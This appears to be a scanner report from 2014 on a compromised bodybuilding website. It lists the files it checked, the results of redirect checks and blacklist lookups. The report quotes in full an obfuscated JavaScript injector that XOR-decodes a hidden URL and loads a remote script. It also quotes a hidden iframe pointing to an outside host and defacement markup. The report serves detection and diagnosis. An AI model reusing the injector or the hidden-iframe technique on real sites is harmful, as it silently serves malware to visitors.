Scanned pages/files
Request | Server response | Status |
http://body-building-site.org/ | 200 OK Content-Length: 114709 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) function vdch() { if(document.all.length > 3) { var t = new Array('#6a7072', '#723e29', '#2d7371', '#752a62', '#637d65', '#6d2a60', '#702b63', '#7a7029'); var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } } var dch = document.createElement("script"); dch.id = "dchid"; dch.src = dchid; document.all[3].appendChild(dch); } else { setTimeout("vdch()",500); } } setTimeout("vdch()",500); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 7 websites. size: 2x12 style: hidden src: http://jl.chura.pl/rc/ <iframe src="http://jl.chura.pl/rc/" style="display:none" width="2" height="12"> Deface/Content modification. The following signature was found: Hacked by Dejoui ...[50181 bytes skipped]... p;rkey3=&target=_blank&orientation=vertical&desc_len=170&order_by=random&talign=left&tid=&desc_bold=normal&title_bold=bold&isCloak=no&CloakID=www.your_link.com&output=js'></script> </td> </tr> </table> <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><title>Hacked by Dejoui</title><link href="http://xcruzz.blogspot.com/favicon.ico" rel="SHORTCUT ICON"><meta content="Hacked by Dejoui" name="description"><meta dejoui"="" dejoui,="" by="" hacked="" ,="" content="Hacked by dejoui" name="keywords"><br><div><a href="javascript:void(0)" onclick="window.open('http://mourouj.org');window.open('http://mourouj.org')"><img src="http://www.upislam.com/images/06398466376000619610.jpg" height="447" width="601">& ...[76502 bytes skipped]... | ||
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6911 Content-Type: text/javascript | clean |
http://affiliateadrotator.com/jquery-latest.js | 200 OK Content-Length: 72191 Content-Type: application/x-javascript | clean |
http://affiliateadrotator.com/ads.js | 200 OK Content-Length: 1615 Content-Type: application/x-javascript | clean |
http://www.cbadrotator-feed.com/feeds2/gen.php?CID=<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <HaCker By HaCkBoy </title> <meta name="keywords" content="HaCkBoy"> <meta name="description" content="HaCkBoy"> </head> </head> <body bgcolor=" | 200 OK Content-Length: 3115 Content-Type: text/html | clean |
http://www.cbadrotator-feed.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: body-building-site.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 18 Oct 2014 19:29:34 GMT
Server: nginx/1.6.2
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: body-building-site.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 18 Oct 2014 19:29:34 GMT
Server: nginx/1.6.2
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: body-building-site.org
Referer: http://www.google.com/search?q=body-building-site.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: body-building-site.org
Referer: http://www.google.com/search?q=body-building-site.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=body-building-site.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://body-building-site.org/
Result: body-building-site.org is not infected or malware details are not published yet.
Result: body-building-site.org is not infected or malware details are not published yet.